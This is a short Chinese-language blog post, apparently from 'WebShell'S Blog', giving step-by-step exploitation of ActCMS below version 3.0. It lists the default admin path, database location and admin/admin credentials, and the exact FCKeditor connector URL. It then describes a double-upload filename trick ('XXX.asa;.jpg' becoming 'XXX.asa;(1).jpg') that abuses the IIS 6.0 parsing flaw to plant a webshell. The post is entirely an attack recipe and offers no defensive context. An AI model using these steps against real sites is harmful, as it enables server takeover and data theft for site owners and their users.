漏洞版本:actcms3.0以下版本
默认后台路径:admin/
默认数据库:App_Data/DataBase.mdb
默认账户:admin
默认密码: admin
利用点:FCK编译器
漏洞界面:
admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=%2Fadmin%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx
利用FCK 2次上传
可上传XXX.asa;.jpg类型
上传后会变成XXX_asa;.jpg
再次上传XXX.asa;.jpg
即可成为XXX.asa;(1).jpg
利用IIS6.0解析漏洞即可拿到webshell

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3674.html